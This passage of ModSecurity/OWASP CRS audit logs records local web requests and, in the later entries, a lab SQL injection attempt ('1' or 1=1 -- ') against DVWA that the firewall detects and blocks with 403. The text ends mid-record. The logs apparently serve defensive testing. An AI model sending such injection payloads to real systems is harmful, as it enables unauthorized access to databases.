Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdOwn8AAQEAABwOGokAAAAB\"]"],"stopwatch":{"p1":519,"p2":867,"p3":45,"p4":322,"p5":90,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGooAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdOwn8AAQEAABwOGooAAAAB\"]"],"stopwatch":{"p1":491,"p2":1031,"p3":46,"p4":252,"p5":49,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrkAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:59:06 GMT","If-None-Match":"\"ccc-54f6abd648acd-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRdTOH8AAQEAABwPUrkAAAAC\"]"],"stopwatch":{"p1":874,"p2":1421,"p3":71,"p4":437,"p5":224,"sr":68,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUroAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 18:21:50 GMT","If-None-Match":"\"295-54f6be54cc0d8\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:40:54 GMT","ETag":"\"295-54f6c29741bca\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdTOH8AAQEAABwPUroAAAAC\"]"],"stopwatch":{"p1":479,"p2":957,"p3":68,"p4":173,"p5":77,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrsAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdTOH8AAQEAABwPUrsAAAAC\"]"],"stopwatch":{"p1":391,"p2":972,"p3":49,"p4":254,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrwAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdTOH8AAQEAABwPUrwAAAAC\"]"],"stopwatch":{"p1":427,"p2":1041,"p3":76,"p4":264,"p5":49,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:36 --0400","transaction_id":"WRdUUH8AAQEAABwQSCgAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":920,"p2":3837,"p3":0,"p4":0,"p5":124,"sr":46,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:39 --0400","transaction_id":"WRdUU38AAQEAABwQSCkAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file 